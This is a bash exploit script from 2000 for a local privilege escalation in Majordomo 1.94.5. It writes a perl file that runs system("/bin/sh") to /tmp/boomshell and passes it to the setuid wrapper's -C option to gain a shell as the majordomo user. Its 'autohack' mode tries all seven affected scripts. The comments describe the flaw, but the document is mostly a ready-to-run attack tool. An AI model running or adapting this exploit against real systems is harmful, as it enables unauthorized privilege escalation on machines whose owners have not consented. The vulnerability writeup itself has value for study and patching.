#!/bin/bash
#
# Majordomo v1.94.5 local linux exploit
# script by slash / buffer0verfl0w security
# <tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>
#
# -- DESCRIPTION
# Majordomo is a perl script for managing mailing lists. The package
# comes with several scripts and a program written in C (wrapper) that
# runs setuid to ensure that majordomo performs all the work with proper
# permissions. This wrapper is installed by default as root, mode 4755 and
# group as the one used for majordomo. What this means? If you can fool 
# majordomo to run arbitrary commands, they'll be run with uid and gid 
# equal to the one used for majordomo.
#
# Almost all of these scripts accept an optional configuration from the
# command line, which is loaded and evaluated via perl's require keyword.
# This file is nothing else than perl code, thus creating a special file
# with our commands and pointing it as the configuration of any of the
# affected scripts will result in the following (this applies to majordomo
# 1.94.5):
#
#    [slash@linux~]$ cat /tmp/boomshell
#    system("/bin/sh");
#    [slash@linux~]$ id
#    uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
#    [slash@linux~]$ ./wrapper bounce-remind -C /tmp/boomshell
#    [slash@linux~]$ id
#    uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)
#
# -- EXPLOIT
# You can run this exploit in two mods: 1) to run all scripts (recomended)
# 						    2) to run a single script
# If you need help with the program run it with the '-h' argument which will 
# show You the help screen. It's allso possible that you will need to change
# the path to Youre Majordomo wrapper (WRAPPER). 
#
# Greets go to my friends at #!b0f, TESO, funkySh (thnx.), ADM, Lam3rZ, 
# lcamtuf and all of the people who know me.
#
# Copyright (c) 2000 slash / buffer0verfl0w security

clear

# Change this if You have to 
WRAPPER=/usr/lib/majordomo/wrapper
BOOMSHELL=/tmp/boomshell

# Majordomo scripts
SCRIPT1=bounce-remind
SCRIPT2=archive2.pl
SCRIPT3=config-test
SCRIPT4=digest
SCRIPT5=majordomo
SCRIPT6=request-answer
SCRIPT7=resend

BOOM ()
{
cat >> $BOOMSHELL << EOF
system("/bin/sh");
EOF
}

RUNME ()
{
echo "Using $SCRIPT$1..."
echo "Creating boomshell..." ; BOOM
$WRAPPER $SCRIPT$1 -C $BOOMSHELL
}

   echo "Majordomo v1.94.5 linux exploit"
   echo "Coded by slash / buffer0verfl0w security "
   echo "<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>"
   echo
   echo "Usage: ./majordomo [-h help] [-a autohack] [<single script>]"

HELP ()
{
   echo "Usage: ./majordomo [-h help] [-a autohack] [<single script>]"
   echo "	-h help - shows this screen"
   echo "	-a autohack - this will try all of the majordomo scripts"
   echo "   <single script> - this will try just the script You specify"
   exit
}

# Auto hack

AUTO ()
{
  echo "Trying all scripts..."
  echo "Creating $BOOMSHELL..."
BOOM 
L=1

  while [ $L -le 7 ]  ; do
   $WRAPPER $SCRIPT$L -C $BOOMSHELL ; let L=$L+1
  done
 exit
}

NOCOMM ()
{
	echo "You have to suply the script name. Try one of these:"
	echo "bounce-remind"
	echo "archive2.pl"
	echo "config-test"
	echo "digest"
	echo "majordomo"
	echo "request-answer"
	echo "resend"
        echo
	echo "Ex. bash# ./majordomo bounce-remind"
	exit
}
       case $1 in
        bounce-remind) RUNME 1;;
        archive2.pl) RUNME 2;;
        config-test) RUNME 3;;
        digest) RUNME 4;;
        majordomo) RUNME 5;;
        request-answer) RUNME 6;;  
        resend) RUNME 7;;
        -h) HELP;;
        -a) AUTO;;
        *) NOCOMM;;
       esac